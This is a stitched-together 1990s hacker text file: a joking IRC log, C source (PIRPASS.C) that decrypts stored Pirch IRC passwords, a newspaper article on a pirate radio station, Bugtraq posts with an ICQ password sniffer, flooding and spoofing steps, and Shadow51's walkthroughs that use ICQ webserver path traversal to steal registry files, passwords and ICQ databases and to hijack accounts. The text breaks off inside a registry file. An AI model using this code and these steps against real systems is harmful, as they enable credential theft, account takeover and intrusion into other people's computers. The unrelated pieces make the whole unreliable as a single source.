for instance i'd be able to get all info on him i want they don't like that but they use standard spank so what do they expect? it's only legal on ip's in ranges below 200. <[tefx]> hehe it's like using hotmail you know everyone can read your mail, but if they do you won't like it well, but you should know he is the agent, but you do not know. if you know I might gess you are the agent too, and the legal for you is not determined. :) *** Odyss3us is now known as Ody|away AlphaVers, who sets the rules on spanking? the monkey of course trust me, spanking on ip's above the 200. range is illegal for me <[tefx]> hymm dimak, nsa does the monkey sets the rules lmao the monkey's with the nsa <[tefx]> i think theres different ranges in th uk. not much though but I heard a spank session is hard to detect..........do you have to use some sort of spoofing method to have a truly successful spank? what is above 200? yeah. In the UK you can only spank up to level 4 ned yes, spank soofing really hard to do though nerd even so I have heard what is above 200? <[tefx]> walrus. in scotland it goes up to 8, but in amsterdam, they let you smoke pot while you spank thats the critical zone *** HuSoft has joined #hackphreak what about wales? like you're ip: 212.48.192.150, that would be illegal <[tefx]> hmm hi again people! to spank I think spanking has been outlawed there <[tefx]> as they have lega sheep spanking , i recon about a 6 <[tefx]> nah yeah. Sheep spanking is on its way out <[tefx]> only sheep spanking is legal, none of this monkey crap hotmail spank is the new protocol sheep spanking was used on arpanet <[tefx]> SSP/IP i think milnet still uses sheep spank AlphaVers, is it possible to prevent spanking of IP, for instance if I send e-mail and do not people to spank it? <[tefx]> sheep spanking protocoll , intyercourse protocoll hotmail spank is fast becoming the global monkey spanking standard <[tefx]> ugh dimak, that would get the monkey pissed <[tefx]> what about spanking penguins ? so it is possible, is it? I heard the aol spank was pretty 1337 I didn't think penguin spanking had been introduced yet <[tefx]> yeah, its a new nmut upgrade <[tefx]> nut i mean walrus, penguin spanking is still an experiment hmm...thats far out shit tho <[tefx]> its in beta test * AlphaVers hopes deamon spanking will be the next standard <[tefx]> yeah, <[tefx]> aint it daemon >?< bsdi got pissed over that so they made it deamon <[tefx]> your telling me as far as I know the pp (penguin protocol) won't be introduced until IPv6 is introduced <[tefx]> argh. <[tefx]> oh, well, there still hope then it will become standard we all know dsp (deamon spanking protocol) will kick pp's ass and the monkey spanking and hotmail spanking will bothe be fazed out <[tefx]> apart from the spanking protocolls there the feet sub set : then theres ftp : foot tapping ptotocoll, http : hyper toe tapping protocoll, yeh no shit <[tefx]> i still think pengiun still has a chance <[tefx]> hmm. <[tefx]> i guess we'll just have to wait and see dimak: do you still want to know how to avoid spanking? <[tefx]> yeah. avoid the leather whip protocoll LWP yes dimak, log that, jp won't tell you how to avoid it right. Go on yahoo, and search for info on anti spanking techniques <[tefx]> heh yahoo is the best one for this <[tefx]> and put in NO porn in the search as well <[tefx]> i prefer altavista 'cause some twisted people will associate it with sex <[tefx]> i though yahoo removed the spanking category ? just be sure you don't get yahoo spanking, that hasn't been used since '91 tefx, the put it back too much compliants popular demand <[tefx]> good. anyway ... <[tefx]> not suprised <[tefx]> i was pissedd of when it left you need to find a page that gives you an anti spank script jp threatened to sue them if they didn'tput it back and you send your email through the script and then nobody can spank your ip <[tefx]> i rmeber when hotmail spanking and mircosoft spanking were totally different, bemore the intercourse, now its passport spanking 'cause its hidden dimak, what os are you on? right to smite a spank you must cause the incoming spank packet to be intercepted by some medium .........it should kinda absorb the spank packet do you want to aviod hotmail spank, or regular spank? w95 damn if you were on bsd i'd have one for you <[tefx]> uh-oh <[tefx]> theres but spanking youve got to avoid aswell i wrote one a while ago working to get it ready for pp and dsp but trying to protect yourself from everytype of spank is ludicrous <[tefx]> i had a spanking setector, but it needed a few other files, an anti-hotmail spank script for BSD? Did you write that in BASIC? alpha, what is bsd? walrus, yeah <[tefx]> when you got spanked on win95, it would say Invalid page fault gbase hever heard <[tefx]> a general protection fault, is a time delayed spank yeah of course newer releases of Win 98 has been patched against hotmail spanks above level 5 every time you get one you got spanked <[tefx]> quite nasty Does anybody know about Win NT spanking? walrus, it'll crash above level 7 thats a sensitive area I've not had time to get any info on spaking in NT been fixed in service pack 5 i think does it depend on what SP (spank pack) you've got <[tefx]> heh there l0pht spank <[tefx]> dont forget that no I think service pack five still had some errors handling the level 8 spank wlarus, yeah, sp 3 should do the trick poeple oftenget service packs and spank packs confused be carefull though, your spank black will stop working You need to modify your registry for spank pack 4 to work don't you? shit of course what was I thinking...... yeah add an extra spank key yeah I wrote a BASIC script for that nerd, cool <[tefx]> what about pgp spanking but some spank packets can still get around that one. For istance the beta penguin spanks can already get through that tefx, don't go there man you never know who's listening in here shit man why the fuck did you mention that? It'd fall on deaf ears you know how the gov feels about pgp spanking <[tefx]> ah true mostof the lamerz in here don't even know the difference between a sheep spank and a standard monkey spank I don't think we should talk about the pgp spank dimak, forget about pgp spanking I am feeling uncomfortable <[tefx]> we could always talk about the clipper spanking controversy tefx, don't I've not heard about that one <[tefx]> oh i got raided for telling ppl about that <[tefx]> ill lay off the cryto spanking dimak: you found an antispank script yet? they took my hardware spank block shit man still trying on yahoo <[tefx]> oh god. took me 2 years to build that thing <[tefx]> thank god its not so bad here in the uk correct parts are very hard to find I'm using a software block to stop hotmail spanks above level 4, 'cause hotmail spank is the most common one <[tefx]> as long as they dont take my spanking board tefx, if you don't tell anyone you have it, you're ok <[tefx]> spanking board, what spanking board ;) I find that a software block can absorb most of the spank packets caused by 'puking' i found textbook on http://lib.daemon.am/Books/Hackers_Guide/ch26/ch26.htm <[tefx]> no <[tefx]> thats nsa. <[tefx]> its the nsa yeah. But the monkey is in the NSA remember <[tefx]> its instructions on how to let them spank you AV was saying earlier stay away from that it could be a 'spank trojan' ohhh nasty like monkey's orifice dimak, you should get a spank scanner too right the monkeys orifice is like a huge hole man......fucking insanity <[tefx]> then thers pmonkey orifice 2k its not that great though brb <[tefx]> then thers hotmail-bus gotta set up some phone spanking stuff soanking the phonelines is some next level shit whoa spanking not the lines, cell phones <[tefx]> whoo prepay mainly <[tefx]> then threse pager spanking right what was I thinking obviously I wasn't * walrus is off bye all guys, it is impossible ot seearch the stuff via yahoo **********This is where tefx's log takes over********** [12:34] <[tefx]> cyas walrus [12:34] *** Parts: walrus (walrus@userb402.uk.uudial.com) [12:34] if you spank a nokia 6110 it'll give you it's card [12:35] <[tefx]> true [12:35] <[tefx]> then theres chocking techniques. [12:35] <[tefx]> chocking the chicken often works [12:35] it gives out shit [12:35] I find the choke protocol very useful [12:35] <[tefx]> or the bash [12:35] <[tefx]> bash:~>bishop [12:35] <[tefx]> bashing bishop [12:35] don't teach him how to choke man [12:36] it allowss better control of the whole spank [12:36] ok ok [12:36] <[tefx]> acces found, level 4, using monkey.... ok [12:36] he ain't ready [12:36] <[tefx]> true [12:36] let him fogure out the simple monkey first [12:36] <[tefx]> heh [12:36] <[tefx]> that can take years [12:36] figure even [12:36] tefx, true [12:37] <[tefx]> or minutes [12:37] right.....he has to start with the monkey spank or he'll go nowhere fast [12:37] took me over a year to get the monkey too [12:37] <[tefx]> if you can do seemore more also know as C++ [12:37] <[tefx]> it takes minutes [12:37] ok, bye all, thank AlphaVers very much for help [12:37] yeah but once you have the monkey the rest is pretty much natural [12:37] <[tefx]> yeah [12:38] you're welcome [12:38] bye [12:38] *** Parts: dimak (dimakworld@ppp-150.pool-113.spbnit.ru) [12:38] later [12:38] <[tefx]> heh [12:38] brb I am gonna try this new spank technique so I might be gone for awhile [12:39] <[tefx]> heh [12:40] <[tefx]> who else wnats to know about spanking ? [12:42] well I am back.... [12:42] that spanking method was quite impressive [12:42] I think it was written in hypercard [12:42] partially [12:43] <[tefx]> heh, mine was done in flash [12:43] some was written in cobol as well [12:43] wow [12:43] depends on the os [12:43] *** Joins: d5 (~d5@wind.angen.net) [12:43] I heard of these hypercard spanks so I had to try it out..... [12:44] hello [12:44] they terminate twice as fast as your standard spank [12:44] I like to reffer to it as the hyperspank [12:45] *** Quits: d5 (spank-lined) [12:45] cool [12:45] <[tefx]> uh oh [12:45] <[tefx]> somebody tried a spank [12:45] NO WAY [12:45] <[tefx]> [12:45] *** Quits: d5 (spank-lined) [12:45] you were spanked by a foriegn host? [12:45] <[tefx]> on undernet. ;) [12:46] <[tefx]> silly boy, either that or an operator spanked him [12:46] for his sake i hope it was an op [12:46] *** Joins: x-deth (~r00t@ppp664.ath.forthnet.gr) [12:46] hi [12:46] wellcome [12:46] howdyz x-deth [12:47] *** Joins: d5 (~d5@wind.angen.net) [12:47] sup? =) [12:47] i was just tryping /spank in mirc and i got a message froma n op ? what happened [12:47] you missed out on some good spaning x-deth [12:47] well i better head out..........but ehm remember not to forget what we sed here cose it was very important [12:48] why doesnt mirc spanking work on undernet [12:48] may the spank protocol be with you [12:48] *** Quits: nerd (Yadayadayada - Ed) [12:48] nerd, go spank 'm [12:49] *** Quits: d5 (Spank Lined - [Undernet.org] - I told you once, i don't like spanmks) [12:55] <[tefx]> so any more spanking questions [13:19] whats uid and gid ? [13:19] uid=0 (root) [13:19] gid=0 (root) [13:19] ? [13:20] tek, yeah [13:20] gid 0 depends on the os [13:20] it's the group root is in [13:20] os is rh 5.1 [13:20] 2.0.34 [13:20] hmm [13:21] oki [13:32] * [tefx] is off/***************************************************************** * * * PIRPASS.C by EXE-Gency * * A program to search the current directory for the any pirch * * passwords. (Pirch is a program that can be used for accessing * * IRC.) Password is normally stored in PIRCH98.INI but PIRPASS * * supports wildcards to you can use GETPIRCH *.INI as well as * * GETPIRCH PIRCH98.INI. The decryption algorithm is taken from * * a file by Daemon0/Underground Periodical. * * * * If you want to compile the source code yourself you'll need a * * copy of DJGPP: * * * * GCC -O PIRPASS.EXE PIRPASS.C * * * *****************************************************************/ #include "stdio.h" #include "dir.h" #include "string.h" #include "process.h" int main(int Argc, char *Argv[]) { FILE *PasswordFile; struct ffblk FileSearch; unsigned int SearchResult, SearchCount; char String[100], *Ptr; if(Argc!=2) { printf("PIRPASS v1.0 by EXE-Gency\n"); printf("Syntax: PIRPASS [filename]\n"); printf("E.G: PIRPASS PIRCH98.INI\n"); exit(1); } printf("PIRPASS v1.0 by EXE-Gency. Program to get pirch password.\n"); SearchCount=0; SearchResult=findfirst(Argv[1], &FileSearch, 0); while(!SearchResult) { SearchCount++; if((PasswordFile=fopen(FileSearch.ff_name, "r"))==NULL) { printf("Cannot open file [%s] for reading!\n", FileSearch.ff_name); } else { while(!feof(PasswordFile)) { fgets(String, 99, PasswordFile); Ptr=strstr(String, "Pw="); if(Ptr) { Ptr+=3; printf("Found password ["); while(*Ptr!=10) { printf("%c", (*Ptr)-127); Ptr++; } printf("] in file [%s]\n", FileSearch.ff_name); } } fclose(PasswordFile); } SearchResult=findnext(&FileSearch); } printf("Finished! %u files scanned.", SearchCount); return 0; } Mr. Brewer the Pirate Doesn't Rule Waves, He Just Makes Them ( Illegal Broadcaster Has Taunted Government for 2 Years; FCC Man: `I'll Nail Him' By Bruce Orwall Staff Reporter of The Wall Street Journal Temple Terrace, Fla. - Radio station 102.1 FM emanates from this Tampa suburb with a crisp, clear signal that carries its biker rock and raunchy talk as far as 20 miles. Its largest audience, bikers and college students, likes the station just fine, enjoying the sex-charged banter, the oddball music and the attitude against authority. It's the authorities who have a problem with 102.1 FM: The Federal Communications Commission says the station, broadcasting out of Doug Brewer's converted garage, is illegal. Mr Brewer's operation is one of hundreds of unlicensed, or pirate stations, in the U.S., which is in the midst of an unprecedented boom in illegal broadcasting. Mr. Brewer, long-haired, beefy and a self-described redneck biker, has emerged as one of the pirate movement's premier outlaws, mostly because he has thwarted FCC efforts to shut him down for almost two years. This despite the fact that Mr. Brewer, who calls his station "Tampa's Party Pirate," has made himself an easy target. It is no secret that he broadcasts from his garage, where compact disks are strewn indiscriminately and the walls are lined with biker-babe pinups and pictures of stock-car racing stars. "It's ongoing, it's visible, and it just plain rocks," brags Mr. Brewer, who cultivates an on-air image of a rough and tumble biker and isn't averse to self-aggrandizement off the air. His promotional T-shirts boast, "License? We don't need no stinking license" - though truth be told, Mr. Brewer tried to get a license and was turned down. The FCC has been hard-pressed to keep up with the pirate proliferation and has successfully shut down just a few of the multiplying radio bandits. The commission first acted against Tampa's Party Pirate in early 1996, when an anonymous tip led to a written notice warning Mr. Brewer that the station "creates a definite danger of interference to important radio communication and impedes the orderly distribution and protection of the spectrum." A few months later, a licensed rock station in nearby Sarasota, WHFT, broadcasting a hair's breadth away on the dial at 102.5, complained to the FCC that Mr. Brewer's station was causing confusion among its listeners. Fines and Seizures The FCC typically uses fines and equipment seizures to deal with such situations. The agency has threatened Mr. Brewer with both and even issued a $1,000 fine, which has gone unpaid. But Mr. Brewer has stalled the enforcement process by engaging it head on. Unlike most pirates, he has applied for a legitimate license and has also sought "special temporary authority" to remain on the air while his situation is under review. Both requests have been denied, but the maneuvering has bought him time and kept the government from seizing his gear. Mr. Brewer has made a few guerilla moves to keep the FCC at bay. When agents first appeared at his house in January 1996, he wasn't home; he claims they badgered his wife and inpsected his station while it was fully powered. To make sure that doesn't happen again, Mr. Brewer has installed a hidden switch in the laundry room that allows his wife to power the station down from 125 watts to about 10 with a single flick if she sees the FCC prowling the neighborhood. This past Halloween, when FCC agents roamed the neighborhood measuring the strength of the pirate station's signal, Mr. Brewer caught them by surprise, driving up to them in a black van with his radio station logo on the side. Yelling "Smile!" he took the agents' picture and posted it on his Internet site. There are signs the FCC is growing restless. Ralph Barlow, district director of the Tampa field office, won't discuss the specifics of the case against the 43-year-old Mr. Brewer, but concedes that the taunts are "not good" for his agents. The matter is in the hands of prosecutors in the U.S. attorney's office in Tampa, and the FCC is pressing for action. "This guy is going off the deep end because he's been getting away with it for so long," Mr. Barlow says. "Sooner or later I'll nail him." Those kinds of threats don't mean much to Mr. Brewer, who has dabbled in electronics and rebellion for most of his life. Thrown out of a Tampa technical high school, he landed on his feet as phone installer, and later as the operator of an electronics store. In his free time, he became immersed in the subcultures of ham radio, Harley Davidsons and rock 'n' roll. A few years ago, he fought the local government here for the right to erect a 150-foot ham tower over his home. After winning, Mr. Brewer took to lighting the tower like a huge Chirstmas tree each holiday season. To entertain crowds that drove by, he put up a tiny FM transmitter and played Christmas music on an unused portion of the band. The signal carried only a few blocks. Growing ambitious, Mr. Brewer pumped up his operation in 1995, broadcasting all day, every day, and adding wattage. His harsh programming didn't get much of a reaction at first. "One of the big mistakes I made was having eight straight hours of death metal," he says. With the help of his wife, Karen, however, he built an operation that resembles a real radio station, albeit a ragged one. He has advertisers of a sort, and receives promotional compact disks from some record companies. His black van can broadcast live from local bars or businesses. Although the station's signal is clean, its programming swerves from adventurous to amateurish. On a recent night, a disk jockey named Murph misidentified the performer of a song he played and was taken to task by a listener. Mr. Brewer himself goes on the air three times a week, taking full advantage of the fact that, without a license, he is beyond the reach of the FCC's restrictions on foul language. The sexual chitchat has earned Mr. Brewer a rising profile and a bad-boy notoriety he treasures. An alternative newspaper recently crowned him "Best Pig of the Airwaves" in Tampa. Says 20-year-old listener Chas Goldman of Tampa: "I know it's not really legal, but I don't know, man. . . . It's a really cool thing to do." Advertisers on 102.1 FM range from strip clubs to record stores. Mr. Brewer says they provide him with about $1,000 a month in revenue. For just $100 a month, he mentions their businesses several times a day. (He makes a living running an electronics store, which makes some of its income selling FM transmitter kits on the Internet.) Advertiser Scott Harris, owner of Disc-Go-Round, a used CD store, says customers frequently mention the store's spots and tell him, "We're glad you guys are on there because we believe in it." Such sentiments obviously aren't shared by licensed broadcasters. Jeff Daumann, executive vice president and general counsel of the National Association of Broadcasters, says his group's main concern is that the FCC is slowly losing its ability to bring order to the radio dial, and the group is also worried about interference with legitimate stations. "It's not a nuisance," Mr. Daumann says. "It's a serious problem." ICQ so-called protocol Description: The ICQ protocol is ridiculously simplistic and is riddled with security holes. So is the ICQ software. So ICQ users can be spoofed, have their machine crashed, or have evil haxxors run arbitrary code on their boxes. Geez, these poor users might as well run Internet Explorer! Author: Alan Cox Compromise: Spoof, Crash, or exploit the buffer overflow to run arbitrary code Vulnerable Systems: Mostly Windows boxes where the user is running ICQ Date: 14 December 1997 Date: Sun, 14 Dec 1997 14:20:27 GMT From: Alan Cox To: BUGTRAQ@NETSPACE.ORG Subject: Vulnerabilities in ICQ /* This is a little toy to demo the weaknesses in Mirabilis ICQ system. There are two major problems with the ICQ protocol clearly visible. As its an unpublished proprietary system we can assume there may well be far more lurking. Its also too apparent why they dont publish it - my guess has to be "embarrasment factor" The first flaw is plain dumb. They send plaintext authentication. Not only that they send it once per session. The second flaw is that they use easily guessable sequence numbers - starting from 0 each user session, they use UDP and to make life even easier their query service will tell you exactly what IP address to spoof as source when faking them. So you can find someone is on, find their IP and spoof sequences 0->100 with a fair bet that somewhere before the 100th fake message you'll get several hits and spoof messages. If not you can winnuke the victim so he'll be back on a low sequence number 8) Let us hope the proposed Rendezvous Protocol that is supposed to become an internet draft is better designed and that the ICQ people switch to it. There really is no excuse for using crude plaintext and simplistic sequence spaces when five minutes thought could have resolved almost every weakness except password change without US export controlled crypto. I've enclosed a demo that does password sniffing for ICQ. It requires you can work out how to set it up and it doesnt including spoofing code. Alan */ /* * Snoop ICQ traffic for a set host. Shows how simplistic ICQ is and * how easy it is to snoop it. */ #include #include #include #include #include #include #include #include #include #include #include /* * PUT THE IP ADDRESS OF THE CLIENT TO SNOOP HERE OR IT WONT WORK */ #define MY_CLIENT_TO_WATCH 0x7F000001 static int create_socket(void) { int s=socket(AF_INET, SOCK_PACKET, htons(ETH_P_ALL)); if(s==-1) { perror("socket"); exit(1); } return s; } static void close_socket(int s) { close(s); } static void promiscuous(int s, char *iface, int onoff) { struct ifreq ifr; strcpy(ifr.ifr_name, iface); if(ioctl(s, SIOCGIFFLAGS, &ifr)==-1) { perror("SIOCGIFFLAGS"); exit(1); } strcpy(ifr.ifr_name, iface); if(onoff) ifr.ifr_flags|=IFF_PROMISC; else ifr.ifr_flags&=~IFF_PROMISC; if(ioctl(s, SIOCSIFFLAGS, &ifr)==-1) { perror("SIOCSIFFLAGS"); exit(1); } } static __inline__ ip_p(unsigned char *packet, int len) { if(packet[12]==0x08 && packet[13]==0x00) return 1; return 0; } struct icqhdr { unsigned char version[2] __attribute((packed)); /* ?? */ unsigned short command __attribute((packed)); unsigned short sequence __attribute((packed)); unsigned long uid __attribute((packed)); unsigned char data[0]; }; struct icqack { unsigned char version[2] __attribute((packed)); /* ?? */ unsigned short result __attribute((packed)); unsigned short sequence __attribute((packed)); unsigned char data[0]; }; struct icqstring { unsigned short len; char data[0]; }; struct icqlogin { struct icqhdr hdr __attribute((packed)); unsigned long dunno __attribute((packed)); /* 000006FE.L */ unsigned short pw_len __attribute((packed)); unsigned char pw_data[11] __attribute((packed)); struct in_addr addr __attribute((packed)); /* Rest is a mystery right now */ /* 0.L */ /* 2.L */ /* 0000004C, 00000000 */ /* 00 78 */ }; static void print_icq_string(struct icqstring *s) { fwrite(s->data, s->len-1, 1, stdout); } /* * Scan a packet for clues */ static int process_packet(struct sockaddr *sa, unsigned char *packet, int len) { int i; int lv; int d=0; static long num=0; struct iphdr *iph; struct udphdr *udphdr; if(strcmp(sa->sa_data,"eth0")) return 0; /* Wrong port */ if(!ip_p(packet, len)) return 0; iph=(struct iphdr *)(packet+14); udphdr=(struct udphdr *)(iph+1); /* assume no options */ lv=ntohs(udphdr->len); if( udphdr->source !=htons(4000) && udphdr->dest!=htons(4000)) { return 0; } /* printf("packet %d \r", ++num);*/ if(iph->saddr==htonl(MY_CLIENT_TO_WATCH)) { printf("To Server: %d bytes\n", lv); } else if(iph->daddr==htonl(MY_CLIENT_TO_WATCH)) { printf("From Server: %d bytes\n", lv); d=1; } else return 0; i=14+sizeof(struct iphdr); if(len-i>lv) len=i+lv; i+=sizeof(struct udphdr); /* printf("UDP size %d\n",i);*/ if(i>=sizeof(struct icqhdr)+sizeof(struct udphdr)) { struct icqhdr *p=(struct icqhdr *)(udphdr+1); if(d==0) { printf("From %ld\n",p->uid); printf("Version: %d.%d\nCommand ", p->version[1], p->version[0]); switch(p->command) { case 0x000A: printf("Ack"); break; case 0x03E8: { struct icqlogin *il=(struct icqlogin *)p; printf("Login Password "); print_icq_string((struct icqstring *)&il->pw_len); printf(" IP %s", inet_ntoa(il->addr)); break; } #if 0 case 0x0x?? { struct in_addr v=*(struct in_addr *)p->data; printf("Ping %s", inet_ntoa(v)); break; } #endif case 0x409: { printf("Ping"); break; } case 0x0438: { struct icqstring *s=(struct icqstring *)p->data; printf("Disconnect ("); print_icq_string(s); printf(")"); break; } case 0x0456: { /* data +4,5 is always 0100 */ struct icqstring *s=(struct icqstring *)(p->data+6); printf("Message to %ld ", *((long *)p->data)); print_icq_string(s); break; } case 0x0460: { printf("Information %ld on ID %d", *((short *)p->data), *((long *)(p->data+2)) ); break; } case 0x046A: { printf("Information_2 %ld on ID %d", *((short *)p->data), *((long *)(p->data+2)) ); break; } case 0x04D8: { printf("Status "); switch(*((long *)p->data)) { case 0x00: printf("[Away 0]"); break; case 0x01: printf("[Away 1]"); break; case 0x10: printf("[DND 0]"); break; case 0x11: printf("[DND 1]"); break; default: printf("%04X", *((long *)p->data)); } break; } default: printf("%04X", p->command); } if(p->sequence) printf("\nSequence %d\n", p->sequence); else printf("\n"); } } if(i>=sizeof(struct icqack)+sizeof(struct udphdr)) { struct icqack *p=(struct icqack *)(udphdr+1); if(d==1) { printf("Version: %d.%d\nReply ", p->version[1], p->version[0]); switch(p->result) { case 0x000A: printf("Ack"); break; case 0x00E6: printf("Away Reply "); printf("for %ld", *((long *)p->data)); break; case 0x0118: { struct icqstring *is; printf("InfoID %d\n", *((short *)p->data)); printf("ICQ ID %ld\n", *((long *)p->data+2)); is=(struct icqstring *)(p->data+6); printf("Nick "); print_icq_string(is); is=(struct icqstring *)(((char *)is)+is->len+2); printf("\nName "); print_icq_string(is); is=(struct icqstring *)(((char *)is)+is->len+2); printf(" "); print_icq_string(is); is=(struct icqstring *)(((char *)is)+is->len+2); printf("\nEMail "); print_icq_string(is); is=(struct icqstring *)(((char *)is)+is->len+2); printf("\nInfo "); print_icq_string(is); break; } default: printf("%04X", p->result); } if(p->sequence) printf("\nSequence %d\n", p->sequence); else printf("\n"); } } while(i=32 && c< 127) printf("%c", c); else printf("."); } printf("\n"); i+=8; } printf("\n"); fflush(stdout); return 0; } int main(int argc, char *argv[]) { int s; unsigned char buf[1600]; struct sockaddr sa; int salen; int len; s=create_socket(); promiscuous(s, "eth0", 1); while(1) { salen=sizeof(sa); if((len=recvfrom(s, (char *)buf, 1600, 0, &sa, &salen))==-1) { perror("recvfrom"); close_socket(s); exit(1); } process_packet(&sa, buf,len); } printf("An error has occured.\n"); close_socket(s); exit(0); } Date: Sun, 14 Dec 1997 21:17:14 -0500 From: Seth McGann To: BUGTRAQ@NETSPACE.ORG Subject: Re: Vulnerabilities in ICQ At 14:20 12/14/97 GMT, you wrote: The Client-To-Client Protocol used by ICQ is even worse. It does no authentication of any kind and places all trust in the client. Spoofing messages from arbitrary ICQ users is easy, as is sending file and chat requests. Even worse, if the client gets anything it doesn't expect it crashes(!) sometimes taking Windows with it. There is also no flood protection and packet replay is possible. A few thousand messages will slow my P166 to a crawl. The only good thing ICQ did was pick a different port number for each session (well, not really its usually around 1024 as windows seems to allocate port numbers in order.) So, an attack would go as follows: 1. Port scan the target IP looking form 1024-2000 or so. 2. Send some random data to crash it. Using netcat is good for this. (or) 3. Take a valid ICQ message and resend it a million times. (or) 4. Take a valid ICQ message and change the User Identification Numbers. (or) 5. Be creative :) To reverse engineer the protocol, simply study the results of different ICQ activities with a sniffer or some type of Winsock watcher. I have figured out quite a bit about the protocol and will release a more formal writeup soon. Anyone with a few hours should be able to writeup a suitable client message spoofer. I am writing this as I have been exploiting these vulnerablites for quite some time and I haven't seen anything about this on usenet or the mailing lists. As an example, I have provided the transcript of a message. This is an example of a simple message (there are many other types of traffic) of "12345" from UIN 3399052: >> 0000: 2D 00 <- Prefix (if this is wrong bad things happen) >> 0000: 8C DD 33 00 02 00 EE 07 00 00 8C DD 33 00 01 00 >> 0010: 06 00 31 32 33 34 35 00 82 D7 F3 20 82 D7 F3 20 >> 0020: 09 04 00 00 04 00 00 10 01 ED FF FF FF << 0000: 28 00 <- Post fix and ACK << 0000: 5D 29 35 00 02 00 DA 07 00 00 5D 29 35 00 01 00 << 0010: 01 00 00 82 D7 F3 25 82 D7 F3 25 22 07 00 00 04 << 0020: 00 00 00 00 ED FF FF FF Simply send this alot for a flood using netcat (ignoring the responses of course). I wrote a few simple exploits, but they used the socket faq library and seem redundant at this point, so I leave exploitation as an exercise to the reader. Seth M. McGann / smm@wpi.edu "Security is making it http://www.wpi.edu/~smm to the bathroom in time." KeyID: 1024/2048/5FC59C0A Fingerprint F315 1C37 CF3C 3612 3B28 BC84 C430 BC22 5FC5 9C0A Date: Tue, 16 Dec 1997 20:20:41 -0300 From: Solar Designer To: BUGTRAQ@NETSPACE.ORG Subject: Re: Vulnerabilities in ICQ Hello, > The Client-To-Client Protocol used by ICQ is even worse. It does no > authentication of any kind and places all trust in the client. Spoofing > messages from arbitrary ICQ users is easy, as is sending file and chat > requests. Even worse, if the client gets anything it doesn't expect it > crashes(!) sometimes taking Windows with it. Spoofing chat requests? Crashes? 00422D4D lea ecx, [ebp-118h] 00422D53 push dword ptr [esi+18h] 00422D56 push offset aTheFollowingRe 00422D5B push ecx 00422D5C call ds:sprintf ... 004B58F8 aTheFollowingRe db 0Dh,0Ah ; DATA XREF: _text:00422D56o 004B58F8 db 'The following reason for a chat request was given: ',0Dh,0Ah 004B58F8 db ' %s',0Dh,0Ah,0 Unless there's bound checking done before we get here, this overflow is exploitable -- the buffer is on the stack. I'm too lazy to boot Windows to check now. Anyway, there're 100+ references to sprintf() and strcpy() in ICQ, at least some of these have to be exploitable. IDA (the disassembler) is even able to detect standard MSVC functions, so you get symbolic names for them right after the disassembly, and can open a window with the cross references list. Signed, Solar Designer Addendum(if any): ICQ Homepage Exploit By Shadow51 Ever wondered why there is a little house beside the name of some people? That doesn't mean they are at home, it means they have the ICQ-Webserver running. The idiots who made it left huge bugs in it, like you can close their ICQ remotely, and even download their files. The only problem is that you can't see the files, so you have to know what you're downloading. To close the ICQ client: 1. Click on the start button 2. Click on RUN 3. Type Telnet 123.123.123.123 80 Of course replace the 123.123.123.123 by the IP of the victim (note that this bug only works on build 1700 and maybe a few others but I'm not sure). 4. Press ENTER Wait until it connects 5. Type QUIT Wait about 10 seconds. If they go offline that means it worked, if not, then it didn't work. Now suppose you want to get some of their files. Lets say that you want to see the file c:\windows\win.ini, and he or she has the ICQ-Webserver on: 1. Go to your browser 2. Type http://123.123.123.123/.html/......../windows/win.ini note that you need the /.html/ part. It will trick the server into believing it's a html file, and note that there are 8 dots /......../ (that means it goes back 4 dirs if the users ICQ dir is not in a standard place. It can cause problems, but 95% of the time it's in c:\progra~1\icq\ 3. press ENTER in your browser It will simply ask you where you want to save the file the you save it and do what ever you want with it. Now this is not all you can do. There are much better things with this exploit, like getting the user's password files and registry. If you are a lamer, I suggest you go and play with what you just learned, and stop reading now cause this is a bit too complicated for you :P. Okay, so you want to have the registry and all the passes. Okay, before you do this, I warn you that if the user your hacking is not using the same version of Windows you are using, you could end up with a lot of problems. Suppose you have Win98, and they have win95, and it wont work. An easy way to make sure it's the same version is to download their command.com with the exploit, and compare the size with your command.com. There are many other ways, but this is a good one. 1. Get 2 files http://123.123.123.123/.html/......../windows/user.dat and http://123.123.123.123/.html/......../windows/system.dat Remember to change the IP when your done. 2. Copy them in a directory. 3. Make a backup copy of you c:\windows\user.dat and c:\windows\system.dat You're gonna want to have them back when you're done. 4. Restart your computer 5. Press F8 just before it boots up 6. Choose "Command Prompt Only" 7. Delete your current user.dat and system.dat and replace them with the ones from the guy you hacked 8. Reboot your computer 9. Just before it boots, press F8 several times; choose safe mode. 10. Once booted in safe mode, click on start 11. Click on RUN 12. Type regedit 13. Press ENTER 14. Once in Regedit, click on the menu "Registry", then choose "Export Registry File..." 15. Save the file, then get yourself a Password Cracker 16. If all goes well, you now have all the users passwords. It should look something like this: crypt_Blizzard_Storm : A@N www.mircosoft.com : Administration:PASSWORD *Rna\Dan\dannyk : q34ad6gt *Rna\Test\957935 : nar8s7yj *Rna\Test2\wolves : cyal8r *Rna\Test3\curtisph : q73vnrht *Rna\My Connection\USERNAME : PASSWORD *Rna\My Connection 3\USERNAME : PASSWORD 17. Reboot 18. Press F8 at startup 19. Choose "Command Prompt Only" 20. Replace user.dat and system.dat with your originals that you previously had backed up Shadow51 29000000 Shadow51@writeme.com ----------------------------------------------------------------------------------------------------------------------- ICQ Account Cracking By Shadow51 A lot of people have been asking me how it would be possible to crack ICQ accounts. It's very easy, but unfortunately it doesn't work every time. All you do is put in this: 1. Download the following files from the targeted users hard drive using the ICQ exploit: (replace 123.123.123.123 by the guys IP and UIN by the guys ICQ #) (note that there's 6 dots not 8) http://123.123.123.123/.html/....../db/UIN.idx http://123.123.123.123/.html/....../db/UIN.dat http://123.123.123.123/.html/....../db/UINmsg.dat http://123.123.123.123/.html/....../db/UINmsg.idx http://123.123.123.123/.html/....../db/UINhis.idx http://123.123.123.123/.html/....../db/UINhis.dat 2. Open Notepad and create a new document. 3. Copy this into it. (Replace all the HACKEDUIN by the UIN you're hacking) (I got this registry key from http://i.am/devil) REGEDIT4 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN] "Name"="Hacked UIN" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs] "Random Groups Version"=dword:0000000a "Online Color"=dword:00ff0000 "Unlisted Color"=dword:00800000 "Offline Color"=dword:000000ff "Authorize Color"=dword:00400080 "Notify Color"=dword:00800080 "LastStatus Color"=dword:00008000 "Default File Dir"="C:\\Program Files\\ICQ\\Received Files" "SMTP Address"="" "DND Message"="Please do not disturb me now. Disturb me later." "Out Message"="" "Busy Message"="User is occupied. Only urgent messages will be delivered." "Chat Message"="I would like to chat about anything" "Away PreNum"=dword:00000000 